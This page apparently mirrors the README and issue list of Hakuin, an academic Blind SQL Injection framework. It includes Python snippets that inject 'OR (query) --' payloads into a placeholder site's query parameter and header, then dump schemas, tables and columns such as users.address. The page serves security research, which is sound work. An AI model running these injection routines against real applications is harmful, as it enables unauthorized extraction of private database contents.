Git Product home page Git Product logo

hakuin's Introduction

Hakuin is a Blind SQL Injection (BSQLI) optimization and automation framework written in Python 3. It abstracts away the inference logic and allows users to easily and efficiently extract databases (DB) from vulnerable web applications. To speed up the process, Hakuin utilizes a variety of optimization methods, including pre-trained and adaptive language models, opportunistic guessing, parallelism and more.

Hakuin has been presented at esteemed academic and industrial conferences:

More information can be found in our paper and slides.

Installation

To install Hakuin, simply run:

pip3 install hakuin

Developers should install the package locally and set the -e flag for editable mode:

git clone [email protected]:pruzko/hakuin.git
cd hakuin
pip3 install -e .

Examples

Once you identify a BSQLI vulnerability, you need to tell Hakuin how to inject its queries. To do this, derive a class from the Requester and override the request method. Also, the method must determine whether the query resolved to True or False.

Example 1 - Query Parameter Injection with Status-based Inference
import aiohttp
from hakuin import Requester

class StatusRequester(Requester):
    async def request(self, ctx, query):
        r = await aiohttp.get(f'http://vuln.com/?n=XXX" OR ({query}) --')
        return r.status == 200
Example 2 - Header Injection with Content-based Inference
class ContentRequester(Requester):
    async def request(self, ctx, query):
        headers = {'vulnerable-header': f'xxx" OR ({query}) --'}
        r = await aiohttp.get(f'http://vuln.com/', headers=headers)
        return 'found' in await r.text()

To start extracting data, use the Extractor class. It requires a DBMS object to contruct queries and a Requester object to inject them. Hakuin currently supports SQLite, MySQL, PSQL (PostgreSQL), and MSSQL (SQL Server) DBMSs, but will soon include more options. If you wish to support another DBMS, implement the DBMS interface defined in hakuin/dbms/DBMS.py.

Example 1 - Extracting SQLite/MySQL/PSQL/MSSQL
import asyncio
from hakuin import Extractor, Requester
from hakuin.dbms import SQLite, MySQL, PSQL, MSSQL

class StatusRequester(Requester):
    ...

async def main():
    # requester:    Use this Requester
    # dbms:         Use this DBMS
    # n_tasks:      Spawns N tasks that extract column rows in parallel 
    ext = Extractor(requester=StatusRequester(), dbms=SQLite(), n_tasks=1)
    ...

if __name__ == '__main__':
    asyncio.get_event_loop().run_until_complete(main())

Now that eveything is set, you can start extracting DB metadata.

Example 1 - Extracting DB Schemas
# strategy:
#   'binary':   Use binary search
#   'model':    Use pre-trained model
schema_names = await ext.extract_schema_names(strategy='model')
Example 2 - Extracting Tables
tables = await ext.extract_table_names(strategy='model')
Example 3 - Extracting Columns
columns = await ext.extract_column_names(table='users', strategy='model')
Example 4 - Extracting Tables and Columns Together
metadata = await ext.extract_meta(strategy='model')

Once you know the structure, you can extract the actual content.

Example 1 - Extracting Generic Columns
# text_strategy:    Use this strategy if the column is text
res = await ext.extract_column(table='users', column='address', text_strategy='dynamic')
Example 2 - Extracting Textual Columns
# strategy:
#   'binary':       Use binary search
#   'fivegram':     Use five-gram model
#   'unigram':      Use unigram model
#   'dynamic':      Dynamically identify the best strategy. This setting
#                   also enables opportunistic guessing.
res = await ext.extract_column_text(table='users', column='address', strategy='dynamic')
Example 3 - Extracting Integer Columns
res = await ext.extract_column_int(table='users', column='id')
Example 4 - Extracting Float Columns
res = await ext.extract_column_float(table='products', column='price')
Example 5 - Extracting Blob (Binary Data) Columns
res = await ext.extract_column_blob(table='users', column='id')

More examples can be found in the tests directory.

Using Hakuin from the Command Line

Hakuin comes with a simple wrapper tool, hk.py, that allows you to use Hakuin's basic functionality directly from the command line. To find out more, run:

python3 hk.py -h

For Researchers

This repository is actively developed to fit the needs of security practitioners. Researchers looking to reproduce the experiments described in our paper should install the frozen version as it contains the original code, experiment scripts, and an instruction manual for reproducing the results.

Cite Hakuin

@inproceedings{hakuin_bsqli,
  title={Hakuin: Optimizing Blind SQL Injection with Probabilistic Language Models},
  author={Pru{\v{z}}inec, Jakub and Nguyen, Quynh Anh},
  booktitle={2023 IEEE Security and Privacy Workshops (SPW)},
  pages={384--393},
  year={2023},
  organization={IEEE}
}

hakuin's People

Contributors

pruzko avatar aquynh avatar

Stargazers

Alaa Abdulridha avatar Vinicius avatar FlyingPhishy avatar Nate Subra avatar Nyx2023 avatar Scott Sutherland avatar plumbr avatar  avatar  avatar Zeokat avatar Computer button pusher // Pousseur de boutons en informatique  || SIN - SIN HACK - HACK || NO-CODE evangelist || Black coffee like my sense of humor avatar o//。 avatar xrkk avatar Farid LANNABI avatar Matthew McAteer avatar Carles Reig avatar Matthew Linney avatar duongmlt avatar Natworpong Loyswai avatar  avatar ICheer_No0M avatar tpkxmm avatar 0xm1 avatar Nicolas Krassas avatar hoek avatar  avatar Khagesh Sharma avatar Gelven avatar br00x avatar  avatar Matúš Botek avatar Rafael  avatar  avatar Ali Waleed avatar  avatar  avatar Gionne Cannister avatar soffensive avatar cocoonk1d avatar Ryan Armstrong avatar Osirys avatar Damian Tykałowski avatar Jason Trost avatar Naveen avatar Rob Holland avatar  avatar  avatar Alexander Bjørnsrud avatar Andrey Stepanov avatar Darren avatar Nicolas RUFF avatar  avatar Nicolas Vincent avatar  avatar John Adams avatar Aaron Meese avatar yoon jaeheng avatar Erick Bryan Cubas avatar zhifan avatar  avatar Dwi Siswanto avatar Martin Fuchs avatar Khaled Mohamed avatar Sean Ng avatar Subxpl0it avatar clandestination avatar Ch3n2i avatar guly avatar Philip avatar Mike avatar Aditya Gujar avatar aminei_ avatar Cais1 avatar lukas.zmoginas avatar  avatar Tuan Anh Nguyen avatar Tommy Chiang avatar Slzdude avatar Liu Zhihong avatar Kaibro avatar tardc avatar Trần Nguyễn Bảo Khanh avatar Evi1ran avatar chybeta avatar Wynnter avatar Somyos avatar Sarunyu Chankong avatar Demon Slime avatar  avatar Kittipod Lambangchang avatar  avatar 6322775015 avatar NkTheRipper avatar Tonggy avatar thebabush avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar

hakuin's Issues

Tool on top of Hakuin - hk.py

Implement a wrapper tool hk.py that can be quickly used to call Hakuin's basic functionality without the need to write your own python scripts.

Extract all schemas, not just the default one

It is (typically) possible to extract all schemas from vulnerable web applications, but Hakuin now only extracts the default one, the one that the application is connected to. Supporting extraction of all schemas should only require rewriting the injected queries to take the DB name into consideration. For instance, users will become dbo.users.

Support Unicode

Currently, Hakuin supports only ASCII extraction. Extending the implementation to include Unicode characters requires only minor changes to the extraction logic and few new queries.

Support extraction of advanced data types

Hakuin currently extracts texts, ints, floats, and blobs. There are, however, other (possibly DBMS-specific) data types, such as polygon, json, and more. If possible, Hakuin should cast them to text and extract them.

Support more DBMS

Hakuin currently supports only SQLite and MySQL DBMSs, but there are other popular engines.

Hakuin should support:

  • SQLite
  • MySQL
  • Oracle
  • Microsoft SQL Server
  • PostgreSQL
  • Microsoft Access
  • IBM DB2

Optimize extraction of non-textual columns

Hakuin currently extracts non-textual data types with binary search. This can be done more efficiently.

Int:

  • guessing
  • check if all positive
  • model the values with Gaussian distribution and set initial lower and upper bounds to -2 and +2 sigma respectively
  • dynamic

Float:

  • guessing
  • check if all positive
  • dynamic

Bytes:

  • guessing
  • dynamic just like for text, i.e., unigram/fivegram predictions

Support concurency

Hakuin blocks on sending requests. This is not necessary. Instead, there should be multiple tasks extracting column rows independently.

Implementing this feature will require some sync code as the tasks share the same language models.

Automatic DBMS fingerprinting

Hakuin now requires users to specify which DBMS engine is used by the target. This is not practical, because users have to obtain this information manually prior to extraction. Hakuin should include a set of test queries that detect the DBMS automatically.

Check NULL values

Hakuin does not check NULL values before attempting to extract columns. This may lead to wrong results.

Hakuin should check NULL values in a similar fashion as it checks ASCII values, i.e., first on the column level and then on the row level.

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.